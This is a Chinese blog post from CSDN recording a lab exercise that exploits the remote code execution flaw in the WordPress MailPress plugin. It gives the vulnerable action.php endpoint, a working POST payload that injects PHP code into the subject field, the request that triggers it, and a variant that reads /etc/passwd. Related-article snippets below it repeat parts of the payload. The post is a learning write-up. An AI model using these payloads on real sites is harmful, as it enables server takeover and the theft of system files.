WordPress-Mailpress远程代码执行漏洞——利用

最新推荐文章于 2024-04-20 10:21:31 发布
最新推荐文章于 2024-04-20 10:21:31 发布
阅读量4.4k 收藏 2
点赞数 1
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjnuwsf/article/details/71642943
版权

相关资料:

http://www.jeeseen.com/archives/421.html

http://www.xingkonglangzi.com/post-662.html

https://www.exehack.net/3509.html

https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

我的漏洞环境是http://X.X.X.X:18000/(我的便宜安全师父搭的)

一、首先,我使用Firefox,在Firefox里添加一个叫做HackBar的插件:

直接使用Firefox浏览器搜索HackBar,选中第一个点进去


点进去之后添加HackBar到Firefox,然后按照提示重启Firefox就好:


重启之后的Firefox会在顶端多出一点东西:


二、接下来就是利用漏洞了:

按照那些资料提示,我们把URL写到HackBar中(注意这里的URL是你的漏洞环境的ip地址和端口),然后选中enable post data写要提交的数据:

  URL:

 
http ://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php
post:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1


把上一步得到的ID写在下一步的URL中

URL:

http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=上一步得到的ID


到这里该漏洞的基本的利用已经实现

三、师父还留个扩展问题,利用php系统函数去尝试读取 /etc/passwd 文件:

这里就把前面的post数据中subject的数据改掉,改为<?php echo file_get_contents('/etc/passwd')?>

改过后的post数据为:

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php echo file_get_contents('/etc/passwd')?>&html=&plaintext=&mail_format=standard&autosave=1

相关步骤及结果截图如下:






信安之耻
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022信安冬令营day1——WordPress-Mailpress远程代码执行漏洞
m0_54628962的博客
02-16 2528
wordpress 由IP地址进入网页 利用wpscan软件扫描该IP地址发现漏洞Mailpress插件远程代码执行漏洞 Mailpress插件远程代码执行漏洞复现 利用火狐hackbar插件 F12进入 web控制台,把URL写入hackbar,选Post data键,传入post值,运行 URL: http://IP地址:端口/wp-content/plugins/mailpress/mp-includes/action.php POST:action=autosave&id=0&
WordPress远程命令执行
harker_20的博客
11-15 1028
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://mp.csdn.net/mdeditor/103079416 漏洞信息 漏洞编号:CVE-2016-10033 漏洞简述:WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用漏洞就能实现远程代码执行,针对目标服务器实现即时访问,...
[Vulfocus解题系列] WordPress远程命令执行(CVE-2016-10033)
00勇士王子的博客
07-07 2271
漏洞介绍 名称: wordpress 远程代码执行 (CVE-2016-10033) 描述: WordPressWordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞(CVE-2016-10033)在 WordPress Core 代码的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用远程攻击者可以利用漏洞执行代码。 影响版本 WordPr
WordPress 插件存在漏洞,500 万网站面临严重安全风险
最新发布
dzqxwzoe的博客
04-20 1158
网络安全研究人员近期发现 WordPress LiteSpeed Cache 插件存在一个安全漏洞,该漏洞被追踪为CVE-2023-40000,未经身份验证的威胁攻击者可利用漏洞获取超额权限。!small?LiteSpeed Cache 主要用于提高网站性能,据不完全统计已经有 500 多万安装用户。Patchstack 研究员 Rafie Muhammad 表示,LiteSpeed Cache。
WordPress-Mailpress远程代码执行漏洞
冷冷的oO
02-16 3290
在kali使用火狐浏览器打开靶场192.168.7.200,看到题目。 访问题目给出的网址192.168.7.100。 在终端使用WPScan扫描网址: 输入命令wpscan --url IP 然后扫描结果显示Interesting Findings,仔细观察。 在这里我们主要对mailpress rce漏洞进行复现,找到flag。 步骤: 1.安装HackBar插件,浏览器右上角菜单-首选项-左下角扩展与主题-搜索,按F12/Fn+F12可使用插件. 2.调出插件,输入URL和要提交的数据
WordPress-Mailpress插件远程代码执行漏洞
Jim的博客
09-07 1002
漏洞利用:subject=
php wordpress漏洞,wordpress 4.6远程代码执行漏洞环境搭建
weixin_39942033的博客
03-25 275
这篇文章主要是记录下搭建漏洞测试环境的过程,然而从午开始,断断续续的一直折腾到凌晨,只是搭建了成功了本地能复现的环境,并没有实现远程复现。究其原因,主要是固执到一直想用daocloud来搭建测试环境,坑好多,花了太多时间来填坑了,记录下过程。docker pull wordpress:4.6-php5.6-apachedocker pull daocloud.io/library/mysql:5...
WordPress 5.0.0远程代码执行漏洞研究.pdf
09-09
WordPress 5.0.0 远程代码执行漏洞研究》这篇文章主要探讨了在互联网高速发展的背景下,Web应用程序的安全问题日益突出。随着开源软件的广泛应用,其安全性问题引起了安全从业者们的广泛关注。开源软件在当前网络...
「WEB应用防火墙」WordPress 5.0.0远程代码执行漏洞研究 - AI安全.zip
12-06
「WEB应用防火墙」WordPress 5 安全测试 安全漏洞 渗透测试 web安全 安全防护
wordpress-4.8.1-zh_CN.tar.gz
10-27
这个名为"wordpress-4.8.1-zh_CN.tar.gz"的压缩包文件,正是WordPress 4.8.1版本的文版,旨在为文用户带来更加友好的使用体验。 WordPress 4.8.1是这个开源项目的稳定版本,它在前一个版本的基础上进行了多方面...
wordpress-6.4.3-zh_CN.zip
02-01
本压缩包“wordpress-6.4.3-zh_CN.zip”包含的是WordPress的最新稳定版本——6.4.3的文语言包,为国内用户提供了更友好的操作界面。接下来,我们将详细探讨这个版本的关键特性、更新内容以及如何有效利用...
wordpress-6.4.2-zh_CN.zip
12-29
2. **函数与钩子**:了解 WordPress 的函数和钩子机制,开发者可以编写自定义功能,例如通过动作钩子在特定时机执行代码,过滤钩子则可以改变数据输出。 3. **REST API**:WordPress 的 REST API 允许开发者以 JSON...
最新WordPress插件漏洞,影响超过700万个网站
w3cschools的博客
03-18 515
研究人员已经披露了多个WordPress插件漏洞,如果成功利用这些漏洞,则攻击者可以在某些情况下运行任意代码并接管网站。 这些缺陷已在Elementor(一个用于超过700万个网站的网站构建器插件)和WP Super Cache(用于服务WordPress网站的缓存页面的工具)发现。 据国际知名白帽黑客、东方联盟创始人郭盛华透露:该错误与一组存储的跨站点脚本(XSS漏洞(CVSS评分:6.4)有关,该漏洞是在将恶意脚本直接注入易受攻击的Web应用程序时发生的。 在这种情况下,由于在服务器端
WordPress5.0.0 远程代码执行
nuaa_llf的博客
03-04 3884
原文链接:https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ 这篇博文讲述了利用目录穿越和本地文件包含漏洞的“组合拳”在WordPress核心功能实现远程代码执行。过去6年,该WordPress漏洞一直未被揭示。 影响 【POC视频1】 攻击者需要在目标WordPress网站拥有至少作者级权限的账户,然后就...
wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943
whatday的专栏
08-25 2602
近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心远程代码执行漏洞代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码。据漏洞披露者文所介绍,这个漏洞WordPress核心被发现已经超过6年。 https://github.com/WordPress/WordPress/commit/7bd776bdb3f496898bba46959066c2c4aa8723d1#diff-c3d5c535db5622f3b0242411ee5f9.
代码执行很慢但是数据库很快_WordPress5.0.0远程代码执行漏洞预警
weixin_39938312的博客
12-28 165
漏洞综述关于WordPressWordPress是使用PHP语言开发的博客平台,WordPress也是网络上广受欢迎的内容管理系统(CMS)之一,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress有许多第三方开发的免费模板,安装方式简单易用,同时WordPress拥有成千上万个各式插件和不计其数的主题模板样式。漏洞介绍近日,WordPress发布一个安...
request获取int类型的值_启明星辰ADLab:ThinkPHP5核心类Request远程代码漏洞分析
weixin_39607935的博客
11-20 483
更多资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)漏洞介绍2019年1月11日,ThinkPHP团队发布了一个补丁更新,修复了一处由于不安全的动态函数调用导致的远程代码执行漏洞。该漏洞危害程度非常高,默认条件下即可执行远程代码。启明星辰ADLab安全研究员对ThinkPHP的多个版本进行源码分析和验证后,确认具体受影响的版本为T...
WordPress Browser Rejector 插件"wppath"远程文件包含漏洞
weixin_30478619的博客
01-11 135
漏洞版本: WordPress Browser Rejector 2.x 漏洞描述: Browser Rejector可以提示或阻止用户使用旧版本的Web浏览器。 Browser Rejector 2.10及之前版本没有正确验证wp-content/plugins/browser-rejector/rejectr.js.php内的"wppath" GET参数,可被利用包含本...
Wordpress漏洞复现
weixin_52194536的博客
09-10 8808
cms漏洞
远程代码执行攻击与防护实验怎么做
04-02
2. 攻击代码的编写:编写一个包含远程代码执行漏洞的攻击代码,并将其上传至Web应用程序。 3. 实施攻击:使用攻击代码向目标系统发送恶意请求,触发远程代码执行漏洞,获取目标系统的控制权。 4. 防护方案的实施...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值